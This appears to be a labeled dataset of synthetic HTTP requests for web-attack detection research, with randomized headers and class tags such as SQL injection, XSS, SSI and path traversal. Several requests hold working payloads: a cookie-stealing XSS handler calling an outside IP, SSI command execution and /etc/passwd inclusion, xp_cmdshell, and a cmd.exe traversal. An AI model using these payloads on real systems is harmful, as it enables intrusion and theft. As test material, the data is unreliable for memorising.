Referer: /reteeu/ieEt/tsrH/buDyoHw/Emso.fgf
TE: deflate
Trailer: Via
User-Agent: a9oBXD3T- http://www.naiO.net
UA-CPU: PowerPC
UA-Disp: 776,149,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 411x727
Via: 5.8 17.83.235.142, 3.2 117.87.41.173, FTP/1.8 174.112.172.23
Transfer-Encoding: sctr
Upgrade: nume/0.6, Uma/7.3
Warning: 607 www.RgHm.tiff "solih9ny" 
X-Forwarded-For: 105.91.132.113
X-Serial-Number: 276586158043
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38170
Start - Id: 48978
class: XPathInjection
GET /9FhttphomeTlw@-dT40w/jWlMMWLBKKZy7/ssXc5eGhwWEdzNNcB.htm?h8lsAneoi=bnehzjadoe&ybkriwretzpsahj=676905&chuaftirhDaa=7667&o5eimu=rltlrnos%27+++++or+++++fw6a%2F2aah%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D288%5D++or+++%27issnn75%27%3D+%27&1lnUt78s=aieihoGqpuid+&maoa5are7lcame=e%2B%3B&nDnwrquat=h2sT0gl1N&1otU8za9dcelhy=fnI0lhr4D&qEfbexecrm@NGP=de%7Ef HTTP/1.1
Host: www.hcBnrsne.gov
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.3, gzip;q=0.6, identity;q=0.9, identity, identity
Accept-Language: se-t, e-mcr;q=0.3
Cache-Control: max-age=5
Client-ip: 222.228.251.61
Cookie: 3lell=sgmcsuRbhaZ;TnndrooTls=42;eisgaierea9rSt=1246
Cookie2: $Version="480"
Date: Sat, 22 Sep 07 13:13:29 GMT
ETag: "4QmhRB4r6WXtHBkjG4w"
Expect: 100-continue
From: t9tuib@hAiy5.cz
If-Modified-Since: Mon, 04 Feb 08 02:56:51 CET
If-Unmodified-Since: Tue, 23 Jan 07 15:41:20 CET
If-Match: *
If-None-Match: *
If-Range: "@-h9Wu@nbEzc-oR"
Max-Forwards: 556
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM RmE3Nm9vdGNCZ3BlaXk4ZHJ3aHNiRWVueWRucWVuZ20=
Authorization: ltecs izzi=e1tnnski
Range: 23-,057-,45-
Referer: http://mhun.biz/Ctie/dhhhIc/y0aOcy.php4
TE: chunked;q=0.2,deflate;q=0.5,deflate;q=0.8
Trailer: Accept-Encoding
User-Agent: o_PK1U7LA_ http://www.feltvfcA.fr
UA-CPU: 68000
UA-Disp: 757,752,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 395x881
Via: glhd7/1.4 www.REHk.gif
Transfer-Encoding: deflate
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 248 www.elmeri.shtml "SdvreCihiq" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48978
Start - Id: 38009
class: LdapInjection
GET /OMN5z85/n32lXQMuHrjmPhesCTey/hrsiaas6Rco8/BgMUlike3beinsertm/rMTa34zJ9A6oIV4PPyQ/nLcw.v/rZtCcwKQfezdholRjPOR/o5fenfnerHameeb.gif?alonrrnenJga=30610165&4iyowm=Xto%3EvrGan&li9i30EMiH=tre%29+o&HOsVQwIdj=nomotmp&thhthicatsnmhp=r8BBnv%40_&i5ei3obi=%29++++%28%7C+%28bbm%3DSa*%29&Nxp_GTi=bw-likeoEldtnae%27i HTTP/1.0
Host: www.Ereteot.org
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: deflate, deflate, deflate, identity
Accept-Language: tersrMhh-sratsq;q=0.8
Cache-Control: max-age=869
Client-ip: 138.168.151.21
Cookie: cat_GnslYNCAupdate=9ahhnr;rtanas1Rereree=:6ut;ZtUiSG=cJVUu;Fac2Si_wfR=c6iueeednt
Cookie2: $Version="949"
Date: Mon, 06 Jul 09 04:39:02 GMT
ETag: "FpA_UeDHlRzDYzb"
Expect: 100-continue
From: 8nlhbept@3gle.ch
If-Modified-Since: Thu, 19 Mar 09 14:10:48 UTC
If-Unmodified-Since: Tue, 20 Oct 09 06:35:53 GMT
If-Match: *
If-None-Match: "yuFYIrDhYCpRPiOVR"
If-Range: Thu, 23 Apr 09 09:52:45 CET
Max-Forwards: 271
MIME-Version: 9.9
Pragma: dsier=iphxe
Proxy-Authorization: Digest cnonce="uskm"
Authorization: Basic dXdydDozaXNhbg==
Range: 17672-41
Referer: /trHrhr.wav
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.5 (Windows; U; WinNT 3.4; eT-no; rv:8.4.5) Gecko/77208278
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 880x8476
Via: FTP/5.8 211.90.80.241
Transfer-Encoding: identity
Upgrade: jrr/4.9, egaar/4.0, 1Zoc/3.1, zjwo/5.8, 95o/6.0
Warning: 461 www.3izrso.tiff "rrcdd92qh0Axrii" 
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38009
Start - Id: 36126
class: PathTransversal
GET /dAHi42hemvo/u6jhUU6VHGft1Yla9/h3legcd4/jpYwhere3_Hreplacetd-@I0au/uicninycftp/ts/ekiZPnTfWU4WtiMZRG1/dolup9ee2nhTl/pueypesoooluhcig0d/eBP@6/svX51stdinMh/z3Oor.dll?Sp2ee8wn70grr=2&mJmo=%5CWINNT%5Csystem.ini&rsn7e6Y1olie=9%2Fmrmth+h8locationn&9ecguswtf2lfmke=pB5lrbaHs9u&oegon9ta=tlgYside4hl4e&Straiv=iw03u6&r8dxdta=6675422479&eloGUsme0b6s=Teodwhere%2BottTform6ta&Gjcoryneeup=rl HTTP/1.1
Host: www.nMne.de
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-6, us-ascii;q=0.7, windows-1257;q=0.0, hz-gb-2312;q=0.7
Accept-Encoding: 
Accept-Language: naasre6w-ynntlH, oihs-cuOGlot;q=0.0
Cache-Control: min-fresh=5106
Client-ip: 107.18.136.170
Cookie: roi=2650526;rrAeq7etoyo1=eCt1oyeIusurewh;aawsnpalgnov7=tfEh
Cookie2: $Version="5"
Date: Mon, 14 Apr 08 02:26:48 GMT
ETag: "O@wdOljLOEMWn41hVasM"
Expect: ltosnt
From: dzgo@mzeta.ch
If-Modified-Since: Wed, 27 Jun 07 12:01:14 UTC
If-Unmodified-Since: Fri, 05 Jun 09 11:01:55 CET
If-Match: "b5e7vsLGQtX1LeaFOqP"
If-None-Match: "tb8Sol@aX43QjRt1"
If-Range: "A2JxszXcuc0p9dt-XP"
Max-Forwards: 14
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: sneew wtipeu1=scttED
Range: -549293,-6
Referer: /oEazse/dmfndett/fBrneyu/l8itfssi.aspx
TE: trailers,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.5 (Windows; U; Win 9x 8.2; nj-ah; rv:8.6.3) Gecko/36047234
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7606x3250
Via: 5.8 www.so2ohbsn.gif, 8.6 15.246.216.61:661
Transfer-Encoding: deflate
Upgrade: qsat/1.5, cnarW/6.7
Warning: 482 65.238.5.101 "ois0cbedlccylrNmtRrg" "Sun, 04 Jun 06 04:15:57 GMT"
X-Forwarded-For: 62.96.238.58
X-Serial-Number: 15784658
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36126
Start - Id: 47013
class: XSS
GET /tdi9X7z/98sdorct/kXZOg@WY42s2F_n/cheaihotovSolnoeuA/snoclrrflIiwfnMaSo/ttlaeetag6mOUpc.shtml?7Tfyy0d6YH0window.open=mt+h+vetTenrconnect0x&.1.4=4mOt&fradhytncreeap=hdrdo&srtej=whbK&sm0tegssfdae=378833177&zta=%3Cxml++src++%3D%22+++javascript%3A+++%5Balert++++%28%27udt%27%29%3B%5D+++%22+++%3E&sN48ratrdtig=T&ndNsLf@eNZ2t=tugcehnah1&j5im=ymetoalnepeii&xcsEn=sh&meer=xp_lrminr%3EpotmbxEh3ao&eNtxfa4o9t=f%2FrmnLtSeroe%3A+ HTTP/1.1
Host: 43.150.6.28:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1257;q=0.3, iso-8859-6;q=0.6, windows-1253, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 18.81.58.217
Cookie: qds0w=iuweavlarhfb
Cookie2: $Version="07"
Date: Sun, 06 Mar 05 23:35:45 CET
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: 3tsw=ktosi6aa
From: siiia@cge3.it
If-Modified-Since: Sun, 18 Nov 07 15:50:11 GMT
If-Unmodified-Since: Fri, 25 Feb 05 24:12:07 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 02 Jun 08 11:23:20 CET
Max-Forwards: 8
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWV0YmV0Mm9iQW9DOGd5TmV4U3R4bXRZNnNhbGRlaG9Wdmk=
Authorization: Digest username="unbxdine"
Range: 5-22964
Referer: /ohla/et7p/1msn9/uaht/sfweau.txt
TE: gzip;q=0.3,trailers
Trailer: Upgrade
User-Agent: otbjers/9.3.5.4
UA-CPU: Sparc
UA-Disp: 175,1584,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: Ais/6.2 55.196.188.47, 2.1 88.186.140.32
Transfer-Encoding: aoav
Upgrade: me2u/0.5, c1ltE/4.5, nttiep/4.6, nsse/9.4, npleer/2.6
Warning: 754 www.mve9l.gif "2v5wC34esds" 
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 239527167
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47013
Start - Id: 39959
class: SSI
GET /nrrde/cT-.tf7ToyzG7eJVg/sntbkt/t_NxGKdEPKQ0yLuNMZUF/pRr/ue9Ius/ie6kSJlg4/Goumigrr0Meat.tiff?VrXLNsw1RE=d&ecEigeeVenj=aGmuW_PA2ze&eeWeuzcnesadeit=5981&cu3ebp=%3C%21+++++%23%3C%21--++%23exec+cmd%3D%22id%22--%3E&oUenc=tefln+&ea=tru&script3yxexec=f4&luic=nh4sdocumenttr&aEzcy2ywo8SnN=i&9TGElZ=2cuipateeinAep&@RnUxFs.YF=Teozartay&fromYyS1HF=r+i4glnqx&2oqAnedfuilae=th&na=%2BHnpabin HTTP/1.0
Host: www.d6y9.ch:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: min-fresh=313
Client-ip: 225.57.174.238
Cookie: Suwfpltaar0=8;ylgdytnsuoeant=93438;3R3Z-4pob=120438001;LihockBdrnf=1883;E1qcopy6.=57;mophao=1XZEJy
Cookie2: $Version="86"
Date: Tue, 18 Oct 05 06:15:46 CET
ETag: W/"kT0uPx4hGu-xBjDxNmhh"
Expect: 89Rhie
From: so7e5@hesdawuna.uk
If-Modified-Since: Thu, 23 Jul 09 20:11:20 GMT
If-Unmodified-Since: Sat, 23 Apr 05 10:12:27 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 09 Mar 06 16:37:59 CET
Max-Forwards: 93
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: 7ilWt neoUeF=c3Eyhe
Referer: /ph6same.msf
TE: trailers
Trailer: Connection
User-Agent: Mozilla/5.8 (compatible; MSIE 7.9; Open BSD i386; htbslt; gi9vrdsnaE)
UA-CPU: Sparc
UA-Color: color16
Via: 7.7 www.za0s.css, FTP/1.2 95.97.7.176:270
Transfer-Encoding: identity
Upgrade: AhhELu/2.6, ney/2.3, r4p/4.0, nPq/8.1
Warning: 920 2.33.97.58 "exoEohddhnP0c4dewku" "Sun, 06 Apr 08 17:14:18 CET"
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39959
Start - Id: 39541
class: SSI
PUT /nfIPrApLD0jc.gif? HTTP/1.1
Content-Length: 165
Content-Language: 9rds,w
Content-Encoding: deflate
Content-Location: http://www.nsf9.uk/l6d4gt/eet27Ib/atqydaoe/hxf4/maiwCte.pdf
Content-MD5: QWVnYTlzZGQ2bW1lc21hdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 07 Jan 06 12:10:21 CET
Last-Modified: Sat, 03 Feb 07 16:39:11 GMT
Host: 75.230.207.250
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-2022-kr;q=0.0, x-mac-hebrew;q=0.2, windows-1257;q=0.4, windows-1250;q=0.2, iso-8859-7
Accept-Encoding: 
Accept-Language: h-ral4, npey3omo-rit, d-swtdcytI;q=0.5, a-nukepla
Cache-Control: no-store
Client-ip: 94.165.84.44
Cookie: PpFZIZ=oipu ;t3=gsuthtataiAewec0
Cookie2: $Version="21"
Date: Fri, 25 Sep 09 16:53:01 CET
From: Bdpnrgse@epebjds.it
If-Modified-Since: Tue, 27 Jan 09 12:01:10 UTC
If-Unmodified-Since: Tue, 28 Dec 04 19:24:25 CET
If-Match: *
If-None-Match: *
Max-Forwards: 363
MIME-Version: 5.2
Proxy-Authorization: Basic Vm5zcmFwOjI2aWtvc2Q=
Authorization: Digest nc=bf6CeAFC
Referer: http://itlNte0f.ch/7oTt/edpNalr/rTegd/jItQd/aahUhod.nsf
TE: trailers,gzip;q=0.9
Trailer: Host
User-Agent: iaoa (lV.dvviq5Q; mU_5BJTTP; eu__8F)
UA-Color: color8
Via: 0.0 29.145.133.162
Transfer-Encoding: i1ia7; rbihc=fhaN9o
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 494 189.159.212.31 "fthMulr0sla" 
X-Serial-Number: 1385275787999892465
----: -----------

ohrT688tA=<!--   #include     virtual="/etc/passwd"  -->&EIYGlB.home6=o9@kbNy&arlwesioee=tqILUK2dhD&seMeOfrnnRz8z=selectt/E=s1&meeeuEs=cgxREe

End - Id: 39541
Start - Id: 40538
class: SSI
GET /7znRDQcj/snhasug5feitSlo/rE4g-LoUoaFu1x92pE/oVgR6v_OTjJ.W/m-@Dt63B6BYPuVF71RF/edKRnPPoRU5ZcAgbT89/sssuial8TkuujmeeEn/ozitnUt/94opnetcatBIstdinp/sn9hirla/2EoslulseNcsevxewiee.js?Isr8SrArqno=xtu%3En0ahu5e&rraHex=a+d&sr=kxlog&D0gdoi=%3C%21--++%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E&isnr=efncu&gSBvmDA=7oyck&S06u7ao3bb=6580980&eAcoINdRM=1eCJihrza3ic1 HTTP/1.1
Host: www.oHso7do.org
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: compress, gzip, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 92.225.153.222
Cookie: guun3=cJLacrYCfPpx;pFNSn4@J8=a73a8axbl;eRrulif4=tjx1TJ084Za;i8=biok1at6e9kTd;IteeB=udRoxmlmeE;ald%aniujag
Cookie2: $Version="4"
Date: Wed, 08 Jul 09 21:58:07 GMT
ETag: "X3kgD5J4q3JmZ9IOwmAz"
Expect: 1sirvmcl=R4nloji;dsonoe=nmaoUt
From: phta9t@exney5i.com
If-Modified-Since: Tue, 25 Oct 05 20:11:24 CET
If-Unmodified-Since: Mon, 19 Sep 05 14:08:46 CET
If-Match: "ddBiL5ICfVeojZ0hdr"
If-None-Match: *
If-Range: "Rb_EAgw-lLul@5k9PdY1"
Max-Forwards: 9
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM OGVMczFpMnRvRWdwYWJwZTZyam5hRXJ0U2xhdW5uSXFjaFRPYWU4bzU=
Authorization: Basic ZWVudWJzZW06c2VmbnI=
Range: -607
Referer: http://www.etol.biz/L40i/6siiho/iutrde.bin
TE: trailers
Trailer: Referer
User-Agent: yF_yjI http://www.ivso.it
UA-CPU: MIPS
UA-Disp: 5432,6298,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3418x3633
Via: HTTP/9.3 www.ugthb.js, FTP/3.1 190.32.191.7
Transfer-Encoding: compress
Upgrade: Nnfs/7.4
Warning: 938 248.40.128.148 "sur0lis0nzeta4oe" "Sun, 25 Apr 04 08:25:21 UTC"
X-Forwarded-For: 70.253.19.118
X-Serial-Number: 61054598804485092045
----: -------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 40538
Start - Id: 46417
class: PathTransversal
GET /sStlw0hn/rttemledsoeioe/tsnoitwnaeM9o/3r0oa7seDts/sohmd078tthto.gif?rb=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&seoT0A5a=andogs&dQzOzL=vg%28nt-ernfwnsTo&pnchtd8=to9coeD&ynotnri=wi&eiRMs4k=800&e9tqne23jml=0tawas4fTeeeoi&3wgetypisock_streampwp0aN2=r4iar HTTP/1.1
Host: 52.2.22.99
Connection: not8cn
Accept: application/*;q=0.4
Accept-Charset: *
Accept-Encoding: compress, gzip, identity, deflate, deflate;q=0.0
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 81.141.227.75
Cookie: n8=kr2m
Cookie2: $Version="1"
Date: Sun, 03 Jan 10 22:23:27 UTC
ETag: "7F80YTH_JJbucQ6@88o"
Expect: tFohG3=hic181ot;uotroo=oietD8
If-Unmodified-Since: Sun, 08 Feb 09 14:50:49 CET
If-Match: "cswTilLOxwbu5e5"
If-None-Match: *
If-Range: Wed, 06 Jul 05 20:57:03 GMT
Max-Forwards: 544
MIME-Version: 1.3
Pragma: emse5ea=t
Proxy-Authorization: Basic Yko1MG9kOmVpaG5w
Authorization: l2Xanh 5tpe=n7aj
Referer: /fguMinu/tietawe/ooelt/o3ae.dll
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/2.2 (compatible; Konqueror/5.7; SunOS sun4u; gtes; bBesei0)
UA-CPU: x86
Via: 9.5 44.94.164.201, 4.9 www.pesneY.gif
Transfer-Encoding: identity
Upgrade: hsrO0/6.6, nTafmr/5.2, s8am/7.7, sIshn/6.2
Warning: 543 208.43.170.15 "hd5o7soouee3cviemc" 
X-Forwarded-For: 80.80.233.157
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46417
Start - Id: 44178
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 130.2.57.20
Connection: close
Accept: text/*;q=0.1, application/zip;q=0.2
Accept-Charset: iso-8859-2, ks_c_5601-1987;q=0.9, windows-874, iso-8859-1;q=0.6, ks_c_5601-1987
Accept-Encoding: *;q=0.7
Accept-Language: da-i, eSe-aStGocna, aec-tntwv;q=0.0
Cache-Control: nt='nhu'
Client-ip: 206.218.166.35
Cookie: tmeta50document4G-6=pix_pxXbLf-;dVWmLPwB=3897805590;meiDtaw=)
Cookie2: $Version="987"
Date: Wed, 29 Jul 09 05:12:47 UTC
ETag: W/"M9dWmzaYsbHXIY4Lq7Am"
Expect: 100-continue
From: ulnbn@Ssrnr.st
If-Modified-Since: Thu, 27 May 04 21:22:57 CET
If-Unmodified-Since: Thu, 07 May 09 22:07:52 CET
If-Match: *
If-None-Match: "DhFghXeZQ.Z3snFz"
If-Range: Wed, 12 Oct 05 17:23:43 GMT
Max-Forwards: 3
MIME-Version: 4.3
Pragma: t=n
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: Digest opaque="Henvik"
Range: 5-,-97,-5
Referer: http://www.berab4.net/Nsa3epof.avi
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/8.8 (X11; U; Solaris 3.6; rt-gt; rv:3.0.0) Gecko/23712660
UA-CPU: StrongARM
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 389x154
Via: HTTP/6.8 www.oeAoDdn.jpg, 2.5 97.136.49.86
Transfer-Encoding: identity
Upgrade: llemvt/2.2, yAhrud/8.0, Cskdn/9.3
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 103.223.39.110
X-Serial-Number: 338223
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44178
Start - Id: 40932
class: SSI
GET /otrntr9ostnaic/yJ6fDN/eE@7K4l8DVB2gcNdgry1/hleopV.js?srea=4bdp&hn=ll&ni=23455136&-yz6tZc89=%3C%21--+%23odbc+statement++%3D++++%22select+++oleeaozh%2C+df8hi%2C+++++3gy++++from+++anee+++++order++by+++++5%2C++++020%2C+++++8%22++--%3E HTTP/1.0
Host: www.atxgebos.com:1
Connection: oneste
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: d3-dgn;q=0.6
Cache-Control: no-store
Client-ip: 39.139.56.104
Cookie: drresengndygrn=s;nveo=955111753;59gSoa9Stnksesl=hv2p@mvZ
Cookie2: $Version="8"
Date: Mon, 03 Mar 08 18:15:06 UTC
ETag: W/"8masr5MiUJT4dyo4siJ"
Expect: amEaB=93aoa4dc;ha5Rsoe
From: ioOee@owoeu.be
If-Modified-Since: Thu, 11 Sep 08 02:03:07 UTC
If-Unmodified-Since: Tue, 06 Oct 09 12:34:28 CET
If-Match: "KpnsOLuH73ttjEj9HQPY"
If-None-Match: *
If-Range: "Wk25p3m.Q@-G9Cz8VcE"
Max-Forwards: 8379
MIME-Version: 7.1
Pragma: neshaEiN=ss
Proxy-Authorization: Basic bGVKc3d0OndWMGU=
Authorization: NTLM c21lcm51ZTJ0MmV1aU5kc3N0eWtUa2NvbjdzZHNkc29rZWxFdHJk
Range: -25
Referer: /sqth/oITtLqaA/ges3eem/krpb6ia.pl
TE: trailers,trailers,deflate
Trailer: Upgrade
User-Agent: wscair
UA-CPU: 68000
UA-Disp: 661,5118,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4871x5124
Via: FTP/2.0 www.Rhatdk.html, Tkna/5.7 168.109.198.131, bzancl/3.2 www.mhet.gif
Transfer-Encoding: ainu; Naowi7=1iAw
Upgrade: sade/0.7
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40932
Start - Id: 41163
class: SqlInjection
POST /9Lbt3GvN9-_aPLa.gif? HTTP/1.0
Content-Length: 123
Content-Language: aheqMiyy,xH
Content-Encoding: identity
Content-Location: /mmfdE/nird.jsp
Content-MD5: dG9wYWw3cDdtMnRONXRlag==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 24 Aug 08 12:29:51 UTC
Last-Modified: Wed, 26 Jul 06 02:07:03 CET
Host: 155.62.228.65
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: exec    xp_cmdshell     '"tnfcpc"     >> script.vbs'
Cache-Control: max-stale
Client-ip: 28.62.221.232
Cookie2: $Version="0"
Date: Sat, 20 Sep 08 24:02:06 CET
ETag: W/"or6uhqWDtkercfGxMpjb"
Expect: 100-continue
From: ohmjin2@3p7ntngp.com
If-Modified-Since: Fri, 11 Dec 09 24:02:56 GMT
If-Unmodified-Since: Fri, 01 Feb 08 13:59:32 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 46
Pragma: t3s4=rc8s
Proxy-Authorization: NTLM bmRlbjNlZWVuZW9hdG91NWFxYUlJc2VnZGdvaWM1YWFsc21rYQ==
Range: 921301-
Referer: /PLayeyai.fgf
TE: trailers,trailers,gzip;q=0.4
User-Agent: heameeyo/7.9.4.0.3
UA-Disp: 088,9150,32
UA-OS: Win9x
Via: 4od/5.7 www.oREtmeY.shtml:5916, 4.5 www.ewoei82.html:4207
Transfer-Encoding: aqpaNE
X-Serial-Number: 537097395202969976
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nAhbt=17682&g5hcdteitt9rlhd=3660636057&OevalrM.t=355817&CEc7eet14=81&OotBnoesete7t=07DbluTWO8q&niactC7i2dtindn=887751&l8=ms

End - Id: 41163
Start - Id: 49768
class: XPathInjection
GET /hAe/-c_H/7Wtze6atlssNIS/jHftplocationddocumentr.html?lio3gfbhEniE=irore%27+or+++6++%3C+count%28path%2Fchild%3A%3A*%29+++or+++%27e4dazmk%27++++%3D++++%27&8l.HXZNprp7=yrV6Jt&edmatiaaiA=811 HTTP/1.0
Host: www.psne.st:61
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=21
Client-ip: 253.1.218.202
Cookie: bemoE2Ss=1929
Cookie2: $Version="8"
Date: Sun, 10 Oct 04 24:55:16 GMT
ETag: W/"KnKCfoDimSyNjwBe9@oK"
Expect: 100-continue
From: pohawiI@9f0Ofa.ch
If-Modified-Since: Thu, 19 Mar 09 04:49:38 CET
If-Unmodified-Since: Mon, 06 Apr 09 17:52:38 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 29 Nov 04 01:16:51 UTC
Max-Forwards: 5
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZXNScWFmc2VueXpMc3Vlb255ZXNudWVhc2JlZXU1clRzaUhlY2lk
Range: 038-33,-803
Referer: http://www.0heSt.com/thoe/1mrnnr/aree.asmx
TE: deflate,deflate;q=0.0
Trailer: Connection
User-Agent: Mozilla/3.8 (X11; U; Unix 2.2; pO-hr; rv:9.3.7) Gecko/12026196
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3095x7377
Via: 9.6 125.122.251.44
Transfer-Encoding: deflate
Upgrade: sEr/5.8, wolisa/6.8
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 242.32.16.78
X-Serial-Number: 9273829516846529
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49768
Start - Id: 48073
class: XSS
GET /cecns4shzbci9/isBy57nCdHEw-/v_AAMegHujsv81RwgLx/qAqIbjnq/fBJ6Wdg4cj.f/zrzed/rlA9JvP0vpjwfkQsw-lS.asp?eseeengtute3=%27shutdownT&mRntrenjeFm8rn=boot.inietcd&ts=dswsDnoyoep%2B%29&svoahsdenbi=%3Cimg++src++%3D+%22+++elalrove++++%3E+%22++++onmouseover+++%3D+++%22+++++%5Bwindow.open%28%27http%3A%2F%2F98.220.79.183%2Fllreal.php4%27%2Bdocument.cookie%29%3B%5D%22%3E&5ei=945&n5i2eefrfghonf1=7qamhhtes HTTP/1.1
Host: 196.217.141.228
Connection: close
Accept: video/*
Accept-Charset: iso-8859-4, windows-1250, utf-7;q=0.0, isiri-3342
Accept-Encoding: 
Accept-Language: 5Heapytu-lp;q=0.5, 6rieb-ioh4E3xs;q=0.2, h2anli7-2ataYlxi;q=0.8, jjqsAtl-tlede, AwWl-ltF;q=0.4
Cache-Control: no-transform
Client-ip: 151.8.225.81
Cookie: ji5canbs=68987;jnes=os;n44sIet=yRZ
Cookie2: $Version="5"
Date: Mon, 16 Feb 04 18:13:44 GMT
ETag: "R5BYw6j-JCKxG5F_i"
Expect: fuezA
From: sreEas@au8Ut4bn.gov
If-Modified-Since: Sat, 25 Apr 09 01:54:50 GMT
If-Unmodified-Since: Sun, 22 Aug 04 21:03:16 UTC
If-Match: *
If-None-Match: "Nvg0jxTzLr-Gcr9.lw"
If-Range: *
Max-Forwards: 77
MIME-Version: 5.2
Pragma: SAa=f
Proxy-Authorization: Digest nonce
Authorization: nc4hh h2tOta=iy5a
Range: -1,041-88,-53
Referer: /ieren/mcpsid.cgi
TE: chunked;q=0.2,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.5 (Machintosh; U; PPC 2.6; ar-a2; rv:7.1.7) Gecko/15007128
UA-CPU: x86
UA-Disp: 4437,742,16
UA-OS: Win9x
UA-Pixels: 6001x2247
Via: 19g/1.8 www.ssheta.shtml, 5.5 27.199.70.159
Transfer-Encoding: nptae
Upgrade: 0eadh/9.5, oyzasn/0.3, ulmsi7/4.4, bdhaod/9.0, riJn/7.4
Warning: 634 www.yauedif.css:99300 "eQn3Xdra5ghbItoas" 
X-Forwarded-For: 69.186.228.89
~~~~~: ~~~~~~~~~~

null

End - Id: 48073
Start - Id: 48896
class: XPathInjection
